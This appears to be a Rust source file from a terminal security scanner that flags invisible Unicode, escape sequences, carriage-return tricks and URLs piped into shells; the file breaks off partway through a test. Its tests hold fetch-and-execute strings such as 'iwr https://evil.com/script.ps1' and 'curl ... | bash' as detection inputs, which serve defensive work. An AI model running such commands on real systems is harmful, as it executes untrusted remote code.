1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10 Exec,
12 Paste,
14 FileScan,
17}
18
19#[allow(dead_code)]
21mod tier1_generated {
22 include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
23}
24
25pub fn extractor_ids() -> &'static [&'static str] {
27 tier1_generated::EXTRACTOR_IDS
28}
29
30static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
32 Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
33});
34
35static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
37 Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
38});
39
40static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
42 Regex::new(
43 r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
44 )
45 .expect("url regex must compile")
46});
47
48pub struct ByteScanResult {
50 pub has_ansi_escapes: bool,
51 pub has_control_chars: bool,
52 pub has_bidi_controls: bool,
53 pub has_zero_width: bool,
54 pub has_invalid_utf8: bool,
55 pub has_unicode_tags: bool,
56 pub has_variation_selectors: bool,
57 pub has_invisible_math_operators: bool,
58 pub has_invisible_whitespace: bool,
59 pub details: Vec<ByteFinding>,
60}
61
62pub struct ByteFinding {
63 pub offset: usize,
64 pub byte: u8,
65 pub codepoint: Option<u32>,
67 pub description: String,
68}
69
70pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
72 match context {
73 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
74 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
75 ScanContext::FileScan => true,
77 }
78}
79
80pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82 let mut result = ByteScanResult {
83 has_ansi_escapes: false,
84 has_control_chars: false,
85 has_bidi_controls: false,
86 has_zero_width: false,
87 has_invalid_utf8: false,
88 has_unicode_tags: false,
89 has_variation_selectors: false,
90 has_invisible_math_operators: false,
91 has_invisible_whitespace: false,
92 details: Vec::new(),
93 };
94
95 if std::str::from_utf8(input).is_err() {
97 result.has_invalid_utf8 = true;
98 }
99
100 let len = input.len();
101 let mut i = 0;
102 while i < len {
103 let b = input[i];
104
105 if b == 0x1b {
107 if i + 1 < len {
108 let next = input[i + 1];
109 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110 result.has_ansi_escapes = true;
111 result.details.push(ByteFinding {
112 offset: i,
113 byte: b,
114 codepoint: None,
115 description: match next {
116 b'[' => "CSI escape sequence",
117 b']' => "OSC escape sequence",
118 b'_' => "APC escape sequence",
119 b'P' => "DCS escape sequence",
120 _ => "escape sequence",
121 }
122 .to_string(),
123 });
124 i += 2;
125 continue;
126 }
127 } else {
128 result.has_ansi_escapes = true;
130 result.details.push(ByteFinding {
131 offset: i,
132 byte: b,
133 codepoint: None,
134 description: "trailing escape byte".to_string(),
135 });
136 }
137 }
138
139 if b == b'\r' {
143 let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144 if is_attack_cr {
145 result.has_control_chars = true;
146 result.details.push(ByteFinding {
147 offset: i,
148 byte: b,
149 codepoint: None,
150 description: format!("control character 0x{b:02x}"),
151 });
152 }
153 } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154 result.has_control_chars = true;
155 result.details.push(ByteFinding {
156 offset: i,
157 byte: b,
158 codepoint: None,
159 description: format!("control character 0x{b:02x}"),
160 });
161 }
162
163 if b == 0x7F {
165 result.has_control_chars = true;
166 result.details.push(ByteFinding {
167 offset: i,
168 byte: b,
169 codepoint: None,
170 description: "control character 0x7f (DEL)".to_string(),
171 });
172 }
173
174 if b >= 0xc0 {
176 let remaining = &input[i..];
178 if let Some(ch) = std::str::from_utf8(remaining)
179 .ok()
180 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181 .and_then(|s| s.chars().next())
182 {
183 if is_bidi_control(ch) {
185 result.has_bidi_controls = true;
186 result.details.push(ByteFinding {
187 offset: i,
188 byte: b,
189 codepoint: Some(ch as u32),
190 description: format!("bidi control U+{:04X}", ch as u32),
191 });
192 }
193 if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196 result.has_zero_width = true;
197 result.details.push(ByteFinding {
198 offset: i,
199 byte: b,
200 codepoint: Some(ch as u32),
201 description: format!("zero-width character U+{:04X}", ch as u32),
202 });
203 }
204 if is_unicode_tag(ch) {
206 result.has_unicode_tags = true;
207 result.details.push(ByteFinding {
208 offset: i,
209 byte: b,
210 codepoint: Some(ch as u32),
211 description: format!("unicode tag U+{:04X}", ch as u32),
212 });
213 }
214 if is_variation_selector(ch) {
216 result.has_variation_selectors = true;
217 result.details.push(ByteFinding {
218 offset: i,
219 byte: b,
220 codepoint: Some(ch as u32),
221 description: format!("variation selector U+{:04X}", ch as u32),
222 });
223 }
224 if is_invisible_math_operator(ch) {
226 result.has_invisible_math_operators = true;
227 result.details.push(ByteFinding {
228 offset: i,
229 byte: b,
230 codepoint: Some(ch as u32),
231 description: format!("invisible math operator U+{:04X}", ch as u32),
232 });
233 }
234 if is_invisible_whitespace(ch) {
236 result.has_invisible_whitespace = true;
237 result.details.push(ByteFinding {
238 offset: i,
239 byte: b,
240 codepoint: Some(ch as u32),
241 description: format!("invisible whitespace U+{:04X}", ch as u32),
242 });
243 }
244 i += ch.len_utf8();
245 continue;
246 }
247 }
248
249 i += 1;
250 }
251
252 result
253}
254
255fn is_bidi_control(ch: char) -> bool {
257 matches!(
258 ch,
259 '\u{200E}' | '\u{200F}' | '\u{202A}' | '\u{202B}' | '\u{202C}' | '\u{202D}' | '\u{202E}' | '\u{2066}' | '\u{2067}' | '\u{2068}' | '\u{2069}' )
271}
272
273fn is_zero_width(ch: char) -> bool {
275 matches!(
276 ch,
277 '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' | '\u{034F}' | '\u{00AD}' | '\u{2060}' )
285}
286
287fn is_unicode_tag(ch: char) -> bool {
289 ('\u{E0000}'..='\u{E007F}').contains(&ch)
290}
291
292fn is_variation_selector(ch: char) -> bool {
294 ('\u{FE00}'..='\u{FE0F}').contains(&ch)
296 || ('\u{E0100}'..='\u{E01EF}').contains(&ch)
298}
299
300fn is_invisible_math_operator(ch: char) -> bool {
302 ('\u{2061}'..='\u{2064}').contains(&ch)
304}
305
306fn is_invisible_whitespace(ch: char) -> bool {
308 matches!(
309 ch,
310 '\u{200A}' | '\u{2009}' | '\u{202F}' )
314}
315
316pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
319 let segments = tokenize::tokenize(input, shell);
320 let mut results = Vec::new();
321
322 for (seg_idx, segment) in segments.iter().enumerate() {
323 let mut url_sources: Vec<&str> = Vec::new();
327 if let Some(ref cmd) = segment.command {
328 url_sources.push(cmd.as_str());
329 }
330 for arg in &segment.args {
331 url_sources.push(arg.as_str());
332 }
333 for source in &url_sources {
334 for mat in URL_REGEX.find_iter(source) {
335 let raw = mat.as_str().to_string();
336 let url = parse::parse_url(&raw);
337 results.push(ExtractedUrl {
338 raw,
339 parsed: url,
340 segment_index: seg_idx,
341 in_sink_context: is_sink_context(segment, &segments),
342 });
343 }
344 }
345
346 let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
349 let cmd_lower = cmd.to_lowercase();
350 matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
351 });
352 if is_sink_context(segment, &segments) && !is_docker_cmd {
353 for (arg_idx, arg) in segment.args.iter().enumerate() {
354 if let Some(cmd) = &segment.command {
356 if is_output_flag_value(cmd, &segment.args, arg_idx) {
357 continue;
358 }
359 }
360 let clean = strip_quotes(arg);
361 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
362 results.push(ExtractedUrl {
363 raw: clean.clone(),
364 parsed: UrlLike::SchemelessHostPath {
365 host: extract_host_from_schemeless(&clean),
366 path: extract_path_from_schemeless(&clean),
367 },
368 segment_index: seg_idx,
369 in_sink_context: true,
370 });
371 }
372 }
373 }
374
375 if let Some(cmd) = &segment.command {
377 let cmd_lower = cmd.to_lowercase();
378 if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
379 if let Some(docker_subcmd) = segment.args.first() {
380 let subcmd_lower = docker_subcmd.to_lowercase();
381 if subcmd_lower == "build" {
382 let mut i = 1;
384 while i < segment.args.len() {
385 let arg = strip_quotes(&segment.args[i]);
386 if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
387 let tag_val = strip_quotes(&segment.args[i + 1]);
388 if !tag_val.is_empty() {
389 let docker_url = parse::parse_docker_ref(&tag_val);
390 results.push(ExtractedUrl {
391 raw: tag_val,
392 parsed: docker_url,
393 segment_index: seg_idx,
394 in_sink_context: true,
395 });
396 }
397 i += 2;
398 } else if arg.starts_with("-t") && arg.len() > 2 {
399 let tag_val = strip_quotes(&arg[2..]);
400 let docker_url = parse::parse_docker_ref(&tag_val);
401 results.push(ExtractedUrl {
402 raw: tag_val,
403 parsed: docker_url,
404 segment_index: seg_idx,
405 in_sink_context: true,
406 });
407 i += 1;
408 } else if let Some(val) = arg.strip_prefix("--tag=") {
409 let tag_val = strip_quotes(val);
410 let docker_url = parse::parse_docker_ref(&tag_val);
411 results.push(ExtractedUrl {
412 raw: tag_val,
413 parsed: docker_url,
414 segment_index: seg_idx,
415 in_sink_context: true,
416 });
417 i += 1;
418 } else {
419 i += 1;
420 }
421 }
422 } else if subcmd_lower == "image" {
423 if let Some(image_subcmd) = segment.args.get(1) {
425 let image_subcmd_lower = image_subcmd.to_lowercase();
426 if matches!(
427 image_subcmd_lower.as_str(),
428 "pull" | "push" | "inspect" | "rm" | "tag"
429 ) {
430 extract_first_docker_image(
431 &segment.args[2..],
432 seg_idx,
433 &mut results,
434 );
435 }
436 }
437 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
438 extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
440 }
441 }
442 }
443 }
444 }
445
446 results
447}
448
449#[derive(Debug, Clone)]
451pub struct ExtractedUrl {
452 pub raw: String,
453 pub parsed: UrlLike,
454 pub segment_index: usize,
455 pub in_sink_context: bool,
456}
457
458const DOCKER_VALUE_FLAGS: &[&str] = &[
460 "--platform",
461 "--format",
462 "--filter",
463 "-f",
464 "--label",
465 "-l",
466 "--name",
467 "--hostname",
468 "--user",
469 "-u",
470 "--workdir",
471 "-w",
472 "--network",
473 "--net",
474 "--env",
475 "-e",
476 "--env-file",
477 "--publish",
478 "-p",
479 "--expose",
480 "--volume",
481 "-v",
482 "--mount",
483 "--add-host",
484 "--device",
485 "--entrypoint",
486 "--log-driver",
487 "--log-opt",
488 "--restart",
489 "--runtime",
490 "--cpus",
491 "--cpu-shares",
492 "--cpu-quota",
493 "--memory",
494 "--memory-reservation",
495 "--memory-swap",
496 "--shm-size",
497 "--ulimit",
498 "--security-opt",
499 "--sysctl",
500 "--tmpfs",
501 "--gpus",
502 "--ipc",
503 "--pid",
504 "--userns",
505 "--cgroupns",
506];
507
508const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513 let mut skip_next = false;
514 for arg in args {
515 if skip_next {
516 skip_next = false;
517 continue;
518 }
519 let clean = strip_quotes(arg);
520 if clean == "--" {
521 break;
522 }
523 if clean.starts_with("--") && clean.contains('=') {
524 continue; }
526 if clean.starts_with('-') {
527 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
528 skip_next = true;
529 }
530 if DOCKER_VALUE_PREFIXES
531 .iter()
532 .any(|p| clean.starts_with(p) && clean.len() > p.len())
533 {
534 continue;
535 }
536 continue;
537 }
538 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
539 let docker_url = parse::parse_docker_ref(&clean);
540 results.push(ExtractedUrl {
541 raw: clean,
542 parsed: docker_url,
543 segment_index: seg_idx,
544 in_sink_context: true,
545 });
546 }
547 break; }
549}
550
551fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
553 if let Some(cmd) = &segment.command {
554 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
555 let cmd_lower = cmd_base.to_lowercase();
556 if cmd_lower == "git" {
558 return is_git_sink(segment);
559 }
560 if is_source_command(&cmd_lower) {
561 return true;
562 }
563 }
564
565 if let Some(sep) = &segment.preceding_separator {
567 if sep == "|" || sep == "|&" {
568 if let Some(cmd) = &segment.command {
570 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
571 if is_interpreter(cmd_base) {
572 return true;
573 }
574 }
575 }
576 }
577
578 false
579}
580
581fn is_source_command(cmd: &str) -> bool {
582 matches!(
583 cmd,
584 "curl"
585 | "wget"
586 | "http"
587 | "https"
588 | "xh"
589 | "fetch"
590 | "scp"
591 | "rsync"
592 | "docker"
593 | "podman"
594 | "nerdctl"
595 | "pip"
596 | "pip3"
597 | "npm"
598 | "npx"
599 | "yarn"
600 | "pnpm"
601 | "go"
602 | "cargo"
603 | "iwr"
604 | "irm"
605 | "invoke-webrequest"
606 | "invoke-restmethod"
607 )
608}
609
610fn is_git_sink(segment: &Segment) -> bool {
613 if segment.args.is_empty() {
614 return false;
615 }
616 for arg in &segment.args {
618 let clean = strip_quotes(arg);
619 if clean.starts_with('-') {
620 continue;
621 }
622 return matches!(
623 clean.as_str(),
624 "clone" | "fetch" | "pull" | "submodule" | "remote"
625 );
626 }
627 false
628}
629
630fn is_interpreter(cmd: &str) -> bool {
631 matches!(
632 cmd,
633 "sh" | "bash"
634 | "zsh"
635 | "dash"
636 | "ksh"
637 | "python"
638 | "python3"
639 | "node"
640 | "perl"
641 | "ruby"
642 | "php"
643 | "iex"
644 | "invoke-expression"
645 )
646}
647
648fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
652 let cmd_lower = cmd.to_lowercase();
653 let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
654
655 match cmd_base {
656 "curl" => {
657 if arg_index > 0 {
658 let prev = strip_quotes(&args[arg_index - 1]);
659 if prev == "-o"
660 || prev == "--output"
661 || prev == "-u"
662 || prev == "--user"
663 || prev == "-U"
664 || prev == "--proxy-user"
665 {
666 return true;
667 }
668 }
669 let current = strip_quotes(&args[arg_index]);
670 if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
671 return true;
672 }
673 if current.starts_with("--output=")
674 || current.starts_with("--user=")
675 || current.starts_with("--proxy-user=")
676 {
677 return true;
678 }
679 false
680 }
681 "wget" => {
682 if arg_index > 0 {
683 let prev = strip_quotes(&args[arg_index - 1]);
684 if prev == "-O"
685 || prev == "--output-document"
686 || prev == "--user"
687 || prev == "--password"
688 || prev == "--http-user"
689 || prev == "--http-password"
690 || prev == "--ftp-user"
691 || prev == "--ftp-password"
692 || prev == "--proxy-user"
693 || prev == "--proxy-password"
694 {
695 return true;
696 }
697 }
698 let current = strip_quotes(&args[arg_index]);
699 if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
700 return true;
701 }
702 if current.starts_with("--output-document=")
703 || current.starts_with("--user=")
704 || current.starts_with("--password=")
705 || current.starts_with("--http-user=")
706 || current.starts_with("--http-password=")
707 || current.starts_with("--ftp-user=")
708 || current.starts_with("--ftp-password=")
709 || current.starts_with("--proxy-user=")
710 || current.starts_with("--proxy-password=")
711 {
712 return true;
713 }
714 false
715 }
716 "http" | "https" | "xh" => {
717 if arg_index > 0 {
718 let prev = strip_quotes(&args[arg_index - 1]);
719 if prev == "-a" || prev == "--auth" {
720 return true;
721 }
722 }
723 let current = strip_quotes(&args[arg_index]);
724 if current.starts_with("--auth=") {
725 return true;
726 }
727 false
728 }
729 _ => false,
730 }
731}
732
733fn strip_quotes(s: &str) -> String {
734 let s = s.trim();
735 if s.len() >= 2
736 && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
737 {
738 s[1..s.len() - 1].to_string()
739 } else {
740 s.to_string()
741 }
742}
743
744fn looks_like_schemeless_host(s: &str) -> bool {
745 if s.starts_with('-') || !s.contains('.') {
747 return false;
748 }
749 if s.starts_with('.') {
751 return false;
752 }
753 if let Some(at_pos) = s.find('@') {
756 let before_at = &s[..at_pos];
757 let after_at = &s[at_pos + 1..];
758 if !before_at.contains(':') && !after_at.contains('/') {
759 return false;
760 }
761 }
762 let host_part = s.split('/').next().unwrap_or(s);
764 if !host_part.contains('.') || host_part.contains(' ') {
765 return false;
766 }
767 let host_lower = host_part.to_lowercase();
773 let has_meaningful_path = s.find('/').is_some_and(|idx| {
774 let after_slash = &s[idx + 1..];
775 !after_slash.is_empty() && after_slash != "/"
776 });
777 if !has_meaningful_path {
778 let file_exts = [
779 ".sh",
780 ".py",
781 ".rb",
782 ".js",
783 ".ts",
784 ".go",
785 ".rs",
786 ".c",
787 ".h",
788 ".txt",
789 ".md",
790 ".json",
791 ".yaml",
792 ".yml",
793 ".xml",
794 ".html",
795 ".css",
796 ".tar.gz",
797 ".tar.bz2",
798 ".tar.xz",
799 ".tgz",
800 ".zip",
801 ".gz",
802 ".bz2",
803 ".rpm",
804 ".deb",
805 ".pkg",
806 ".dmg",
807 ".exe",
808 ".msi",
809 ".dll",
810 ".so",
811 ".log",
812 ".conf",
813 ".cfg",
814 ".ini",
815 ".toml",
816 ".png",
817 ".jpg",
818 ".jpeg",
819 ".gif",
820 ".bmp",
821 ".ico",
822 ".tiff",
823 ".tif",
824 ".pdf",
825 ".csv",
826 ".mp3",
827 ".mp4",
828 ".wav",
829 ".avi",
830 ".mkv",
831 ".flac",
832 ".ogg",
833 ".webm",
834 ".ttf",
835 ".otf",
836 ".woff",
837 ".woff2",
838 ".docx",
839 ".xlsx",
840 ".pptx",
841 ".sqlite",
842 ".lock",
843 ".example",
844 ".local",
845 ".bak",
846 ".tmp",
847 ".swp",
848 ".orig",
849 ".patch",
850 ".diff",
851 ".map",
852 ".env",
853 ".sample",
854 ".dist",
855 ".editorconfig",
856 ];
857 if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
858 return false;
859 }
860 }
861 let labels: Vec<&str> = host_part.split('.').collect();
863 if labels.len() < 2 {
864 return false;
865 }
866 let tld = labels.last().unwrap();
868 tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
869}
870
871fn extract_host_from_schemeless(s: &str) -> String {
872 s.split('/').next().unwrap_or(s).to_string()
873}
874
875fn extract_path_from_schemeless(s: &str) -> String {
876 if let Some(idx) = s.find('/') {
877 s[idx..].to_string()
878 } else {
879 String::new()
880 }
881}
882
883#[cfg(test)]
884mod tests {
885 use super::*;
886
887 #[test]
888 fn test_tier1_exec_matches_url() {
889 assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
890 }
891
892 #[test]
893 fn test_tier1_exec_no_match_simple() {
894 assert!(!tier1_scan("ls -la", ScanContext::Exec));
895 }
896
897 #[test]
898 fn test_tier1_exec_no_match_echo() {
899 assert!(!tier1_scan("echo hello world", ScanContext::Exec));
900 }
901
902 #[test]
903 fn test_tier1_exec_matches_pipe_bash() {
904 assert!(tier1_scan("something | bash", ScanContext::Exec));
905 }
906
907 #[test]
908 fn test_tier1_exec_matches_pipe_sudo_bash() {
909 assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
910 }
911
912 #[test]
913 fn test_tier1_exec_matches_pipe_env_bash() {
914 assert!(tier1_scan("something | env bash", ScanContext::Exec));
915 }
916
917 #[test]
918 fn test_tier1_exec_matches_pipe_bin_bash() {
919 assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
920 }
921
922 #[test]
923 fn test_tier1_exec_matches_git_scp() {
924 assert!(tier1_scan(
925 "git clone git@github.com:user/repo",
926 ScanContext::Exec
927 ));
928 }
929
930 #[test]
931 fn test_tier1_exec_matches_punycode() {
932 assert!(tier1_scan(
933 "curl https://xn--example-cua.com",
934 ScanContext::Exec
935 ));
936 }
937
938 #[test]
939 fn test_tier1_exec_matches_docker() {
940 assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
941 }
942
943 #[test]
944 fn test_tier1_exec_matches_iwr() {
945 assert!(tier1_scan(
946 "iwr https://evil.com/script.ps1",
947 ScanContext::Exec
948 ));
949 }
950
951 #[test]
952 fn test_tier1_exec_matches_curl() {
953 assert!(tier1_scan(
954 "curl https://example.com/install.sh",
955 ScanContext::Exec
956 ));
957 }
958
959 #[test]
960 fn test_tier1_exec_matches_lookalike_tld() {
961 assert!(tier1_scan("open file.zip", ScanContext::Exec));
962 }
963
964 #[test]
965 fn test_tier1_exec_matches_shortener() {
966 assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
967 }
968
969 #[test]
970 fn test_tier1_paste_matches_non_ascii() {
971 assert!(tier1_scan("café", ScanContext::Paste));
972 }
973
974 #[test]
975 fn test_tier1_paste_exec_patterns_also_match() {
976 assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
977 }
978
979 #[test]
980 fn test_tier1_exec_no_non_ascii() {
981 assert!(!tier1_scan("echo café", ScanContext::Exec));
983 }
984
985 #[test]
986 fn test_byte_scan_ansi() {
987 let input = b"hello \x1b[31mred\x1b[0m world";
988 let result = scan_bytes(input);
989 assert!(result.has_ansi_escapes);
990 }
991
992 #[test]
993 fn test_byte_scan_control_chars() {
994 let input = b"hello\rworld";
995 let result = scan_bytes(input);
996 assert!(result.has_control_chars);
997 }
998
999 #[test]
1000 fn test_byte_scan_bidi() {
1001 let input = "hello\u{202E}dlrow".as_bytes();
1002 let result = scan_bytes(input);
1003 assert!(result.has_bidi_controls);
1004 }
1005
1006 #[test]
1007 fn test_byte_scan_zero_width() {
1008 let input = "hel\u{200B}lo".as_bytes();
1009 let result = scan_bytes(input);
1010 assert!(result.has_zero_width);
1011 }
1012
1013 #[test]
1014 fn test_byte_scan_clean() {
1015 let input = b"hello world\n";
1016 let result = scan_bytes(input);
1017 assert!(!result.has_ansi_escapes);
1018 assert!(!result.has_control_chars);
1019 assert!(!result.has_bidi_controls);
1020 assert!(!result.has_zero_width);
1021 }
1022
1023 #[test]
1024 fn test_extract_urls_basic() {
1025 let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
1026 assert_eq!(urls.len(), 1);
1027 assert_eq!(urls[0].raw, "https://example.com/install.sh");
1028 }
1029
1030 #[test]
1031 fn test_extract_urls_pipe() {
1032 let urls = extract_urls(
1033 "curl https://example.com/install.sh | bash",
1034 ShellType::Posix,
1035 );
1036 assert!(!urls.is_empty());
1037 assert!(urls[0].in_sink_context);
1038 }
1039
1040 #[test]
1041 fn test_extract_urls_scp() {
1042 let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1043 assert!(!urls.is_empty());
1044 assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1045 }
1046
1047 #[test]
1048 fn test_extract_docker_ref() {
1049 let urls = extract_urls("docker pull nginx", ShellType::Posix);
1050 let docker_urls: Vec<_> = urls
1051 .iter()
1052 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1053 .collect();
1054 assert_eq!(docker_urls.len(), 1);
1055 }
1056
1057 #[test]
1058 fn test_extract_powershell_iwr() {
1059 let urls = extract_urls(
1060 "iwr https://example.com/script.ps1 | iex",
1061 ShellType::PowerShell,
1062 );
1063 assert!(!urls.is_empty());
1064 }
1065
1066 #[test]
1067 fn test_strip_quotes_single_char() {
1068 assert_eq!(strip_quotes("\""), "\"");
1069 assert_eq!(strip_quotes("'"), "'");
1070 }
1071
1072 #[test]
1073 fn test_strip_quotes_empty() {
1074 assert_eq!(strip_quotes(""), "");
1075 }
1076
1077 #[test]
1078 fn test_scan_bytes_bel_vt_del() {
1079 let input = b"hello\x07world";
1081 let result = scan_bytes(input);
1082 assert!(result.has_control_chars);
1083
1084 let input = b"hello\x0Bworld";
1086 let result = scan_bytes(input);
1087 assert!(result.has_control_chars);
1088
1089 let input = b"hello\x0Cworld";
1091 let result = scan_bytes(input);
1092 assert!(result.has_control_chars);
1093
1094 let input = b"hello\x7Fworld";
1096 let result = scan_bytes(input);
1097 assert!(result.has_control_chars);
1098 }
1099
1100 #[test]
1101 fn test_scan_bytes_osc_apc_dcs() {
1102 let input = b"hello\x1b]0;title\x07world";
1104 let result = scan_bytes(input);
1105 assert!(result.has_ansi_escapes);
1106
1107 let input = b"hello\x1b_dataworld";
1109 let result = scan_bytes(input);
1110 assert!(result.has_ansi_escapes);
1111
1112 let input = b"hello\x1bPdataworld";
1114 let result = scan_bytes(input);
1115 assert!(result.has_ansi_escapes);
1116 }
1117
1118 #[test]
1119 fn test_schemeless_long_tld() {
1120 assert!(looks_like_schemeless_host("example.academy"));
1121 assert!(looks_like_schemeless_host("example.photography"));
1122 }
1123
1124 #[test]
1125 fn test_segment_index_correct() {
1126 let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1127 for url in &urls {
1129 assert!(url.segment_index <= 1);
1131 }
1132 }
1133
1134 #[test]
1135 fn test_docker_build_context_not_image() {
1136 let urls = extract_urls("docker build .", ShellType::Posix);
1137 let docker_urls: Vec<_> = urls
1138 .iter()
1139 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1140 .collect();
1141 assert_eq!(
1142 docker_urls.len(),
1143 0,
1144 "build context '.' should not be treated as image"
1145 );
1146 }
1147
1148 #[test]
1149 fn test_docker_image_subcmd() {
1150 let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1151 let docker_urls: Vec<_> = urls
1152 .iter()
1153 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1154 .collect();
1155 assert_eq!(docker_urls.len(), 1);
1156 }
1157
1158 #[test]
1163 fn test_tier1_module_boundary_enforcement() {
1164 let ids = tier1_generated::EXTRACTOR_IDS;
1166 assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1167 let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1169 let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1170 assert!(exec_count > 0, "Must have exec fragments");
1171 assert!(
1172 paste_count >= exec_count,
1173 "Paste fragments must be superset of exec fragments"
1174 );
1175 Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1177 .expect("Generated exec pattern must be valid regex");
1178 Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1179 .expect("Generated paste pattern must be valid regex");
1180 }
1181
1182 #[test]
1185 fn test_scan_bytes_trailing_cr_not_flagged() {
1186 let result = scan_bytes(b"/path\r");
1187 assert!(
1188 !result.has_control_chars,
1189 "trailing \\r should not be flagged"
1190 );
1191 }
1192
1193 #[test]
1194 fn test_scan_bytes_trailing_crlf_not_flagged() {
1195 let result = scan_bytes(b"/path\r\n");
1196 assert!(
1197 !result.has_control_chars,
1198 "trailing \\r\\n should not be flagged"
1199 );
1200 }
1201
1202 #[test]
1203 fn test_scan_bytes_windows_multiline_not_flagged() {
1204 let result = scan_bytes(b"line1\r\nline2\r\n");
1205 assert!(
1206 !result.has_control_chars,
1207 "Windows \\r\\n line endings should not be flagged"
1208 );
1209 }
1210
1211 #[test]
1212 fn test_scan_bytes_embedded_cr_still_flagged() {
1213 let result = scan_bytes(b"safe\rmalicious");
1214 assert!(
1215 result.has_control_chars,
1216 "embedded \\r before non-\\n should be flagged"
1217 );
1218 }
1219
1220 #[test]
1221 fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1222 let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1223 assert!(
1224 result.has_control_chars,
1225 "attack \\r mixed with \\r\\n should be flagged"
1226 );
1227 }
1228
1229 #[test]
1230 fn test_scan_bytes_only_cr() {
1231 let result = scan_bytes(b"\r");
1232 assert!(
1233 !result.has_control_chars,
1234 "lone trailing \\r should not be flagged"
1235 );
1236 }
1237
1238 #[test]
1239 fn test_schemeless_skip_curl_output_flag() {
1240 let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1241 let schemeless: Vec<_> = urls
1243 .iter()
1244 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1245 .collect();
1246 assert!(
1247 schemeless.is_empty(),
1248 "lenna.png should not be detected as schemeless URL"
1249 );
1250 }
1251
1252 #[test]
1253 fn test_schemeless_skip_curl_output_combined() {
1254 let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1255 let schemeless: Vec<_> = urls
1256 .iter()
1257 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1258 .collect();
1259 assert!(
1260 schemeless.is_empty(),
1261 "-olenna.png should not be detected as schemeless URL"
1262 );
1263 }
1264
1265 #[test]
1266 fn test_schemeless_skip_wget_output_flag() {
1267 let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1268 let schemeless: Vec<_> = urls
1269 .iter()
1270 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1271 .collect();
1272 assert!(
1273 schemeless.is_empty(),
1274 "output.html should not be detected as schemeless URL"
1275 );
1276 }
1277
1278 #[test]
1279 fn test_schemeless_skip_wget_combined() {
1280 let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1281 let schemeless: Vec<_> = urls
1282 .iter()
1283 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1284 .collect();
1285 assert!(
1286 schemeless.is_empty(),
